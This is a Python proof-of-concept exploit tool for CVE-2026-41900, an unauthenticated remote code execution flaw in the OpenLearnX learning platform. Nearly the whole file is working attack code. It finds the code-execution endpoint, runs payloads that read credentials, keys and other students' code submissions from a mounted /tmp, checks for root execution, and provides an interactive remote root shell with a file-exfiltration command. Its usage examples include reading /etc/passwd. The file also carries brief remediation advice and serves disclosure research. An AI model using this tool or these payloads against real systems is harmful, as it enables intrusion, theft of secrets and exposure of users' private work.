# 5465 Total CVEs
# 26 Years
# GitHub
# README.md
# Rendering markdown...
# POC / exploit.py PY
#!/usr/bin/env python3

import argparse
import json
import os
import readline
import sys
import textwrap
import urllib.error
import urllib.request
from datetime import datetime, timezone

# ANSI SGR escape sequences used to style terminal output.

# Text attributes.
RESET = "\033[0m"
BOLD = "\033[1m"
DIM = "\033[2m"

# Bright foreground colours.
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
MAG = "\033[95m"
CYAN = "\033[96m"
WHITE = "\033[97m"

# Coloured start-up banner; main() prints it unless -q/--quiet is given.
# The padding inside the box is hand-aligned, so edit with care.
BANNER = f"""
{BLUE}╔═══════════════════════════════════════════════════════════════════╗{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE} ██████╗ ██╗     ██╗  ██╗    ██████╗  ██████╗███████╗{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}██╔═══██╗██║     ╚██╗██╔╝    ██╔══██╗██╔════╝██╔════╝{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}██║   ██║██║      ╚███╔╝     ██████╔╝██║     █████╗  {RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}██║   ██║██║      ██╔██╗     ██╔══██╗██║     ██╔══╝  {RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE}╚██████╔╝███████╗██╔╝ ██╗    ██║  ██║╚██████╗███████╗{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}    {BOLD}{WHITE} ╚═════╝ ╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═╝ ╚═════╝╚══════╝{RESET}        {BLUE}║{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}   {CYAN}OpenLearnX Unauthenticated RCE via Container Volume Mount{RESET}      {BLUE}║{RESET}
{BLUE}║{RESET}   {DIM}Tempfile dir traversal → Secret leak → Root container exec{RESET}     {BLUE}║{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}   {YELLOW}CVE-2026-41900{RESET}  •  {YELLOW}GHSA-8h25-q488-4hxw{RESET}                       {BLUE}║{RESET}
{BLUE}║{RESET}                                                                   {BLUE}║{RESET}
{BLUE}║{RESET}                          {MAG}by Christbowel{RESET}                           {BLUE}║{RESET}
{BLUE}╚═══════════════════════════════════════════════════════════════════╝{RESET}
"""

# URL suffixes appended to the target base URL, tried in this order, when
# searching for a live code-execution endpoint.
ENDPOINTS = ["/api/compiler/execute", "/api/coding/execute", "/execute"]

# Lower-case substrings; is_hit() rejects any output that contains one.
FAIL_PATTERNS = [
    "operation not permitted",
    "permission denied",
    "no such file",
    "not found",
    "cannot open",
    "traceback",
    "blocked",
    "security violation",
    "modulenotfounderror",
]

# Registry of named gadgets, keyed by the name accepted by --gadget.
# Each entry holds:
#   "severity" / "cwe" / "desc" - metadata shown on screen and in the report
#   "code"  - Python source that run_gadget() submits to the execution endpoint
#   "check" - predicate applied to the returned output; True means "confirmed"
# The "code" strings are runtime payloads: any edit changes what is sent.
GADGETS = {
    # Lists /app and prints a "LISTING:<count>" header followed by one line
    # per entry; confirmed when the reported count is greater than 1.
    # NOTE(review): the check calls int() on the text after "LISTING:" and
    # will raise ValueError if that text is not numeric.
    "listing": {
        "severity": "HIGH",
        "cwe": "CWE-538",
        "desc": "Directory listing of mounted /tmp via /app",
        "code": textwrap.dedent("""\
            import os
            base = '/app'
            entries = os.listdir(base)
            print(f"LISTING:{len(entries)}")
            for e in sorted(entries):
                full = os.path.join(base, e)
                size = os.path.getsize(full) if os.path.isfile(full) else -1
                tag = "DIR" if os.path.isdir(full) else f"{size}B"
                print(f"  {tag:>10s}  {e}")
        """),
        "check": lambda o: "LISTING:" in o and int(o.split("LISTING:")[1].split("\n")[0]) > 1,
    },
    # Globs a fixed set of extensions under /app and prints the first 800
    # characters of each regular file smaller than 50000 bytes.  If nothing
    # matches, falls back to the first 15 sorted /app entries that are small
    # non-.py files (500 characters each).  Confirmed when any "FILE:" line
    # is present in the output.
    "secrets": {
        "severity": "CRITICAL",
        "cwe": "CWE-538 / CWE-377",
        "desc": "Read credentials and secrets from /tmp",
        "code": textwrap.dedent("""\
            import os, glob
            found = False
            for pat in ['/app/*.conf', '/app/*.pem', '/app/*.key', '/app/*.env',
                        '/app/*.json', '/app/*.yml', '/app/*.yaml', '/app/*.cfg',
                        '/app/*.ini', '/app/*.secret', '/app/*.sock']:
                for f in glob.glob(pat):
                    if os.path.isfile(f) and os.path.getsize(f) < 50000:
                        found = True
                        print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
                        print(open(f).read()[:800])
                        print("---")
            if not found:
                for f in sorted(glob.glob('/app/*'))[:15]:
                    if os.path.isfile(f) and not f.endswith('.py') and os.path.getsize(f) < 50000:
                        found = True
                        print(f"FILE:{os.path.basename(f)}:{os.path.getsize(f)}")
                        print(open(f).read()[:500])
                        print("---")
            if not found:
                print("NO_FILES")
        """),
        "check": lambda o: "FILE:" in o,
    },
    # Prints up to 10 /app/*.py files other than the running script (600
    # characters each) after a "SUBMISSIONS:<count>" header; confirmed when
    # that header is present.
    "submissions": {
        "severity": "HIGH",
        "cwe": "CWE-538",
        "desc": "Read other students' code submissions from /tmp",
        "code": textwrap.dedent("""\
            import os, glob
            own = os.path.abspath(__file__) if '__file__' in dir() else ''
            pyfiles = [f for f in glob.glob('/app/*.py')
                       if os.path.isfile(f) and os.path.abspath(f) != own]
            if pyfiles:
                print(f"SUBMISSIONS:{len(pyfiles)}")
                for f in sorted(pyfiles)[:10]:
                    print(f"\\n--- {os.path.basename(f)} ({os.path.getsize(f)}B) ---")
                    print(open(f).read()[:600])
            else:
                print("NO_SUBMISSIONS")
        """),
        "check": lambda o: "SUBMISSIONS:" in o,
    },
    # Prints the process uid and gid; confirmed when the output contains
    # "UID:0".
    "rootcheck": {
        "severity": "MEDIUM",
        "cwe": "CWE-250",
        "desc": "Confirm root execution (no user= in containers.run)",
        "code": "import os; uid=os.getuid(); gid=os.getgid(); print(f'UID:{uid} GID:{gid}')",
        "check": lambda o: "UID:0" in o,
    },
    # Parses the Cap* lines of /proc/1/status and prints CapEff in hex.
    # Prints "DEFAULT_CAPS" for any non-zero CapEff value, "CAPS_DROPPED"
    # otherwise; confirmed on "DEFAULT_CAPS".
    "caps": {
        "severity": "MEDIUM",
        "cwe": "CWE-250",
        "desc": "Default Docker capabilities (no cap_drop)",
        "code": textwrap.dedent("""\
            caps = {}
            for line in open('/proc/1/status'):
                if line.startswith('Cap'):
                    k, v = line.strip().split(':\\t')
                    caps[k] = v
            eff = int(caps.get('CapEff', '0'), 16)
            print(f"CAPEFF:0x{eff:016x}")
            print("DEFAULT_CAPS" if eff > 0 else "CAPS_DROPPED")
        """),
        "check": lambda o: "DEFAULT_CAPS" in o,
    },
}


def log_ok(msg):
    """Print *msg* as a success line, prefixed with a green ``[+]`` marker."""
    marker = f"{GREEN}[+]{RESET}"
    print(f"  {marker} {msg}")


def log_fail(msg):
    """Print *msg* as a failure line, prefixed with a red ``[-]`` marker."""
    marker = f"{RED}[-]{RESET}"
    print(f"  {marker} {msg}")


def log_info(msg):
    """Print *msg* as an informational line, prefixed with a blue ``[*]`` marker."""
    marker = f"{BLUE}[*]{RESET}"
    print(f"  {marker} {msg}")


def log_warn(msg):
    """Print *msg* as a warning line, prefixed with a yellow ``[!]`` marker."""
    marker = f"{YELLOW}[!]{RESET}"
    print(f"  {marker} {msg}")


def log_hit(sev, msg):
    """Print *msg* prefixed with a ``[<sev>]`` tag coloured by severity.

    Severities without a dedicated colour are shown in white.
    """
    palette = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN, "INFO": DIM}
    colour = palette[sev] if sev in palette else WHITE
    tag = f"{colour}[{sev}]{RESET}"
    print(f"  {tag} {msg}")


def http_post(url, payload, timeout=20):
    """POST *payload* as JSON to *url* and return ``(status, body)``.

    Args:
        url: Absolute URL to send the request to.
        payload: JSON-serialisable object used as the request body.
        timeout: Socket timeout in seconds.

    Returns:
        A ``(status, body)`` tuple in which *body* is always a ``dict``.
        On success *status* is the HTTP status code and *body* the decoded
        JSON object.  For an HTTP error response *status* is the error code
        and *body* is the decoded JSON object, or ``{"error": ...}`` when the
        error body is not a JSON object.  Every other failure (malformed
        URL, connection problem, non-JSON body) gives status ``0`` and
        ``{"error": ...}``.
    """
    body = json.dumps(payload).encode()
    try:
        # Request() is built inside the ``try`` because it raises ValueError
        # for a URL without a scheme; that is reported like any other failure
        # instead of escaping as a traceback.
        req = urllib.request.Request(url, data=body,
                                     headers={"Content-Type": "application/json"},
                                     method="POST")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, parsed = resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as e:
        # HTTPError must be handled before URLError, its base class.
        try:
            parsed = json.loads(e.read())
        except Exception:
            parsed = None
        if not isinstance(parsed, dict):
            parsed = {"error": str(e)}
        return e.code, parsed
    except urllib.error.URLError as e:
        return 0, {"error": f"{e.reason}"}
    except Exception as e:
        return 0, {"error": str(e)}

    # Callers use ``.get`` on the body, so a JSON array or scalar is reported
    # as an error rather than passed through.
    if not isinstance(parsed, dict):
        kind = type(parsed).__name__
        return status, {"error": f"unexpected JSON response type: {kind}"}
    return status, parsed


def http_get(url, timeout=10):
    """GET *url* and return ``(status, body)`` with the JSON body decoded.

    This is a best-effort helper: any failure (malformed URL, connection
    error, HTTP error status, non-JSON body) gives ``(0, {})``.  *body* is
    always a ``dict``; a response whose JSON is not an object is returned as
    ``(status, {})``.

    Args:
        url: Absolute URL to fetch.
        timeout: Socket timeout in seconds.
    """
    try:
        # Built inside the ``try``: Request() raises ValueError for a URL
        # without a scheme.
        req = urllib.request.Request(url, method="GET")
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status, parsed = resp.status, json.loads(resp.read())
    except Exception:
        return 0, {}
    if not isinstance(parsed, dict):
        return status, {}
    return status, parsed


def execute(endpoint, code, lang="python"):
    """Submit *code* to *endpoint* and return ``(output, error, blocked)``.

    Args:
        endpoint: Full URL of the execution endpoint.
        code: Source text placed in the request's ``"code"`` field.
        lang: Value of the request's ``"language"`` field.

    Returns:
        ``output`` and ``error`` are the stripped ``"output"`` and ``"error"``
        fields of the response (``""`` when missing or falsy), and ``blocked``
        is the response's ``"blocked"`` field, defaulting to ``False``.
    """
    def _text(value):
        # Falsy values collapse to "" as before; other non-string values are
        # stringified so that .strip() cannot raise AttributeError.
        return str(value).strip() if value else ""

    _, resp = http_post(endpoint, {"language": lang, "code": code})
    if not isinstance(resp, dict):
        # Defensive: the fields below are read with .get.
        resp = {}
    output = _text(resp.get("output"))
    error = _text(resp.get("error"))
    blocked = resp.get("blocked", False)
    return output, error, blocked


def is_hit(output, blocked=False):
    """Return True when *output* looks like a successful result.

    A blocked or empty response is never a hit.  Otherwise the output counts
    as a hit unless it contains, case-insensitively, a FAIL_PATTERNS entry.
    """
    if blocked:
        return False
    if not output:
        return False
    lowered = output.lower()
    for pattern in FAIL_PATTERNS:
        if pattern in lowered:
            return False
    return True


def find_endpoint(target):
    """Return the first ENDPOINTS URL on *target* that echoes the probe marker.

    Each candidate is sent a one-line print statement.  A candidate whose
    response is flagged as blocked is reported and skipped.  Returns ``None``
    when no candidate responds with the marker.
    """
    probe = 'print("OLX_PROBE_OK")'
    for path in ENDPOINTS:
        candidate = target + path
        log_info(f"Probing {DIM}{candidate}{RESET}")
        output, _error, was_blocked = execute(candidate, probe)
        if "OLX_PROBE_OK" in output:
            log_ok(f"Live endpoint: {GREEN}{candidate}{RESET}")
            return candidate
        if was_blocked:
            log_warn(f"Blocked (patched?) at {candidate}")
    return None


def run_check(target):
    """Probe *target* and report whether it appears vulnerable.

    Steps: query the health endpoint (informational only), locate a live
    execution endpoint, then run two probes through it: one that prints the
    process uid and one that tries to list ``/app``.

    Returns:
        ``(endpoint, vulnerable)``.  ``(None, False)`` when no execution
        endpoint responds; ``(endpoint, True)`` when either probe succeeds;
        ``(endpoint, False)`` when neither does.
    """
    print(f"\n{BOLD}[CHECK]{RESET} Verifying {target}\n")

    # The health result is only displayed; it does not affect the verdict.
    health_url = target + "/api/compiler/health"
    log_info(f"GET {health_url}")
    status, resp = http_get(health_url)
    if status == 200:
        log_ok(f"Health OK — Docker: {resp.get('docker_available')}")
    else:
        log_info("Health endpoint not found (expected for pre-patch)")

    ep = find_endpoint(target)
    if not ep:
        log_fail("No live execution endpoint found")
        return None, False

    # Probe 1: is the submitted code running as uid 0?
    out, _, _ = execute(ep, "import os; print(f'UID:{os.getuid()}')")
    root = "UID:0" in out

    # Probe 2: can /app be listed?  Any "MOUNT:<n>" reply counts, including
    # n == 0.
    out2, _, _ = execute(ep, textwrap.dedent("""\
        import os
        try:
            n = len(os.listdir('/app'))
            print(f"MOUNT:{n}")
        except:
            print("NO_MOUNT")
    """))
    mount = "MOUNT:" in out2

    print()
    # Both partial outcomes are still returned as vulnerable (True).
    if root and mount:
        log_ok(f"{GREEN}VULNERABLE{RESET} — root exec + /tmp volume mount exposed")
        return ep, True
    elif mount:
        log_warn(f"{YELLOW}PARTIAL{RESET} — /tmp mounted but not root")
        return ep, True
    elif root:
        log_warn(f"{YELLOW}PARTIAL{RESET} — root exec but /tmp not mounted")
        return ep, True
    else:
        log_fail(f"{RED}NOT VULNERABLE{RESET} — patched or different config")
        return ep, False


def run_gadget(ep, name):
    """Run the gadget called *name* through endpoint *ep* and print the outcome.

    Prints the gadget's severity line, then either a blocked notice, up to
    30 lines of confirmed output, or a short "not confirmed" detail.

    Returns:
        ``True`` when the gadget's check accepts the output, else ``False``.

    Raises:
        KeyError: if *name* is not a key of GADGETS.
    """
    gadget = GADGETS[name]
    log_hit(gadget["severity"], f"{gadget['desc']} {DIM}({gadget['cwe']}){RESET}")

    output, error, was_blocked = execute(ep, gadget["code"])
    if was_blocked:
        print(f"      {RED}BLOCKED{RESET} — security filter")
        return False

    if not gadget["check"](output):
        detail = output[:120] or error[:120] or "(empty)"
        print(f"      {DIM}not confirmed: {detail}{RESET}")
        return False

    for line in output.splitlines()[:30]:
        print(f"      {DIM}│{RESET} {line}")
    return True


def run_all_gadgets(ep):
    """Run every gadget in GADGETS against *ep*, in registry order.

    Returns:
        ``(results, evidence)``: *results* maps each gadget name to its
        boolean outcome; *evidence* lists a ``{"gadget", "severity", "cwe"}``
        dict for each confirmed gadget.
    """
    print(f"\n{BOLD}[EXPLOIT]{RESET} Running all gadgets against {CYAN}{ep}{RESET}\n")
    results, evidence = {}, []
    for name in GADGETS:
        confirmed = run_gadget(ep, name)
        results[name] = confirmed
        if confirmed:
            meta = GADGETS[name]
            evidence.append(
                {"gadget": name, "severity": meta["severity"], "cwe": meta["cwe"]}
            )
        print()
    return results, evidence


def run_command(ep, cmd):
    """Run shell command *cmd* through endpoint *ep* and return its text output.

    The command is embedded with ``repr`` in a short Python snippet that calls
    ``subprocess.run(..., shell=True)`` with a 15-second timeout and prints
    the captured stdout followed by stderr.

    Returns:
        A coloured notice when the response is flagged as blocked; otherwise
        the response output, else its error text, else ``""``.
    """
    code = textwrap.dedent(f"""\
        import subprocess
        r = subprocess.run({repr(cmd)}, shell=True, capture_output=True, text=True, timeout=15)
        if r.stdout: print(r.stdout, end='')
        if r.stderr: print(r.stderr, end='')
    """)
    out, err, blk = execute(ep, code)
    if blk:
        return f"{RED}[blocked by security filter]{RESET}"
    return out or err or ""


def interactive_shell(ep):
    """Run a read-eval-print loop that forwards each line to run_command().

    Input history is loaded from and saved to ``~/.olx_shell_history`` via
    ``readline``.  ``exit``/``quit``, EOF, or Ctrl+C end the loop.  A line
    starting with ``download `` is handled by download_file() instead of
    being executed remotely.
    """
    print(f"\n{BOLD}{CYAN}┌──────────────────────────────────────────────┐{RESET}")
    print(f"{BOLD}{CYAN}│  OLX Remote Shell — CVE-2026-41900           │{RESET}")
    print(f"{BOLD}{CYAN}│  Type 'exit' or Ctrl+C to quit               │{RESET}")
    print(f"{BOLD}{CYAN}│  Each command spawns a new container          │{RESET}")
    print(f"{BOLD}{CYAN}└──────────────────────────────────────────────┘{RESET}\n")

    # The host name is fetched once and used only for the prompt; it falls
    # back to "container" when the query returns nothing.
    out, _, _ = execute(ep, "import os; print(os.uname().nodename)")
    hostname = out.strip() or "container"

    histfile = os.path.expanduser("~/.olx_shell_history")
    try:
        readline.read_history_file(histfile)
    except FileNotFoundError:
        # No history file yet.
        pass

    while True:
        try:
            # "root" and "/app" are fixed prompt text, not queried values.
            prompt = f"{RED}root@{hostname}{RESET}:{BLUE}/app{RESET}# "
            cmd = input(prompt)
        except (EOFError, KeyboardInterrupt):
            print(f"\n{DIM}[shell closed]{RESET}")
            break

        cmd = cmd.strip()
        if not cmd:
            continue
        if cmd.lower() in ("exit", "quit"):
            print(f"{DIM}[shell closed]{RESET}")
            break

        # Local built-in: everything after the first space is the path.
        if cmd.startswith("download "):
            remote_path = cmd.split(" ", 1)[1].strip()
            download_file(ep, remote_path)
            continue

        result = run_command(ep, cmd)
        if result:
            print(result)

    # Saving history is best-effort; any failure is ignored.
    try:
        readline.write_history_file(histfile)
    except Exception:
        pass


def download_file(ep, remote_path):
    """Fetch *remote_path* through endpoint *ep* into the current directory.

    A path that does not start with ``/app/`` is re-rooted under ``/app/``.
    The remote snippet prints a ``SIZE:<n>`` line followed by the file's
    base64 encoding, or ``NOT_FOUND``.  On success the decoded bytes are
    written to a local file named after the remote file's base name.  The
    outcome is reported with log_ok()/log_fail(); nothing is returned.
    """
    if not remote_path.startswith("/app/"):
        remote_path = "/app/" + remote_path.lstrip("/")
    code = textwrap.dedent(f"""\
        import base64, os
        path = {repr(remote_path)}
        if os.path.isfile(path):
            data = open(path, 'rb').read()
            print(f"SIZE:{{len(data)}}")
            print(base64.b64encode(data).decode())
        else:
            print("NOT_FOUND")
    """)
    out, err, blk = execute(ep, code)
    # A blocked response is reported with the same "File not found" message.
    if "NOT_FOUND" in out or blk:
        log_fail(f"File not found: {remote_path}")
        return
    lines = out.strip().splitlines()
    if len(lines) >= 2 and lines[0].startswith("SIZE:"):
        import base64
        # The reported size is used only in the log message below.
        size = int(lines[0].split(":")[1])
        data = base64.b64decode(lines[1])
        local = os.path.basename(remote_path)
        with open(local, "wb") as f:
            f.write(data)
        log_ok(f"Downloaded {local} ({size}B)")
    else:
        log_fail(f"Unexpected response: {out[:100]}")


def save_evidence(target, ep, evidence):
    """Write the findings report as indented JSON and return its file name.

    The report is written to ``cve-2026-41900-evidence.json`` in the current
    working directory, replacing any existing file of that name.

    Args:
        target: Base URL that was tested.
        ep: Execution endpoint URL that was used.
        evidence: List of finding dicts stored under ``"findings"``.
    """
    path = "cve-2026-41900-evidence.json"
    generated_at = datetime.now(timezone.utc).isoformat()
    report = dict(
        cve="CVE-2026-41900",
        ghsa="GHSA-8h25-q488-4hxw",
        target=target,
        endpoint=ep,
        auth_required=False,
        timestamp=generated_at,
        findings=evidence,
    )
    with open(path, "w") as handle:
        json.dump(report, handle, indent=2)
    return path


def print_report(target, ep, results, evidence):
    """Print the results summary and, when there is evidence, save it.

    Args:
        target: Base URL that was tested.
        ep: Execution endpoint URL that was used.
        results: Mapping of gadget name to boolean outcome.
        evidence: List of ``{"gadget", "severity", "cwe"}`` dicts for the
            confirmed gadgets.
    """
    confirmed = len([hit for hit in results.values() if hit])

    # Group confirmed gadget names by severity for the summary lines.
    by_severity = {}
    for item in evidence:
        by_severity.setdefault(item["severity"], []).append(item["gadget"])

    rule = f"{BLUE}{'═' * 65}{RESET}"
    stamp = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC')

    print(f"\n{rule}")
    print(f"  {BOLD}CVE-2026-41900 — RESULTS{RESET}")
    print(rule)
    print(f"  Target   : {WHITE}{target}{RESET}")
    print(f"  Endpoint : {CYAN}{ep}{RESET}")
    print(f"  Auth     : {RED}NONE REQUIRED{RESET}")
    print(f"  Date     : {stamp}")
    print()

    if confirmed == 0:
        log_fail("No vectors confirmed — instance appears patched")
    else:
        # Insertion order gives the display order: most severe first.
        palette = {"CRITICAL": RED, "HIGH": YELLOW, "MEDIUM": CYAN}
        for sev, colour in palette.items():
            if sev not in by_severity:
                continue
            names = ', '.join(by_severity[sev])
            print(f"  {colour}[{sev:>8s}]{RESET}  {names}")
        print(f"\n  {BOLD}Total : {confirmed} confirmed{RESET}")
        print()
        print(f"  {GREEN}REMEDIATION:{RESET}")
        print(f"    {DIM}→ Update to commit 14765d7 or later{RESET}")
        print(f"    {DIM}→ Apply: cap_drop=['ALL'], user='65534:65534'{RESET}")
        print(f"    {DIM}→ Use per-execution tmpdir, not shared /tmp{RESET}")

    print(rule)

    if evidence:
        saved_to = save_evidence(target, ep, evidence)
        print(f"\n  {GREEN}Evidence → {saved_to}{RESET}")


def build_parser():
    """Build and return the command-line argument parser.

    The parser takes one positional ``TARGET`` base URL, a ``-q/--quiet``
    flag, and a "modes" group: ``--check``, ``--exploit``, ``--shell``,
    ``-c/--command CMD`` and the repeatable ``--gadget NAME``, whose values
    are restricted to the GADGETS keys.
    """
    # Raw epilog text; the formatter class below keeps its layout as written.
    usage_notes = textwrap.dedent(f"""\
        {BOLD}examples:{RESET}
          %(prog)s --check http://target:5000
          %(prog)s --exploit http://target:5000
          %(prog)s --shell http://target:5000
          %(prog)s -c "id" http://target:5000
          %(prog)s -c "cat /etc/passwd" http://target:5000
          %(prog)s --gadget secrets http://target:5000
          %(prog)s --gadget listing --gadget caps http://target:5000

        {BOLD}gadgets:{RESET}
          listing      /tmp directory listing via volume mount       [HIGH]
          secrets      Read credentials and keys from /tmp           [CRITICAL]
          submissions  Read other users' code submissions            [HIGH]
          rootcheck    Confirm UID 0 execution                       [MEDIUM]
          caps         Dump effective Linux capabilities              [MEDIUM]

        {BOLD}shell commands:{RESET}
          download <path>   Exfiltrate a file from /app to local dir
          exit              Close the shell
        """)

    parser = argparse.ArgumentParser(
        prog="olx-rce",
        description="CVE-2026-41900 — OpenLearnX Unauthenticated RCE via Container Volume Mount",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=usage_notes,
    )

    modes = parser.add_argument_group("modes")
    boolean_modes = (
        ("--check", "Check if target is vulnerable (no exploitation)"),
        ("--exploit", "Run all gadgets and generate evidence report"),
        ("--shell", "Drop into an interactive remote shell"),
    )
    for flag, description in boolean_modes:
        modes.add_argument(flag, action="store_true", help=description)
    modes.add_argument("-c", "--command", metavar="CMD",
                       help="Execute a single command and exit")
    modes.add_argument("--gadget", action="append", metavar="NAME",
                       choices=list(GADGETS),
                       help="Run a specific gadget (repeatable)")

    parser.add_argument("target", metavar="TARGET",
                        help="Base URL of the OpenLearnX instance (e.g. http://host:5000)")
    parser.add_argument("-q", "--quiet", action="store_true",
                        help="Suppress banner")

    return parser


def main():
    """Parse the command line and run the selected mode, then exit.

    Modes are tried in a fixed order and only the first one given runs:
    ``--check``, ``-c/--command``, ``--gadget``, ``--exploit``, ``--shell``.
    With no mode the help text is printed and the process exits with 0.
    The exit status is 1 when no endpoint is found, when ``--check`` reports
    not vulnerable, or when ``--exploit`` confirms nothing; otherwise 0.
    """
    parser = build_parser()
    args = parser.parse_args()

    if not args.quiet:
        print(BANNER)

    target = args.target.rstrip("/")

    requested = (args.check, args.exploit, args.shell, args.command, args.gadget)
    if not any(requested):
        parser.print_help()
        sys.exit(0)

    # --check does its own endpoint discovery and diagnostics.
    if args.check:
        _endpoint, vulnerable = run_check(target)
        exit_code = 0 if vulnerable else 1
        sys.exit(exit_code)

    # Every remaining mode needs a live endpoint.
    ep = find_endpoint(target)
    if not ep:
        log_fail("No live execution endpoint found")
        log_info("Run with --check for detailed diagnostics")
        sys.exit(1)

    if args.command:
        print(run_command(ep, args.command))
        sys.exit(0)

    if args.gadget:
        selected = ', '.join(args.gadget)
        print(f"\n{BOLD}[GADGETS]{RESET} {selected}\n")
        for gadget_name in args.gadget:
            run_gadget(ep, gadget_name)
            print()
        sys.exit(0)

    if args.exploit:
        results, evidence = run_all_gadgets(ep)
        print_report(target, ep, results, evidence)
        exit_code = 0 if any(results.values()) else 1
        sys.exit(exit_code)

    if args.shell:
        interactive_shell(ep)
        sys.exit(0)


if __name__ == "__main__":
    main()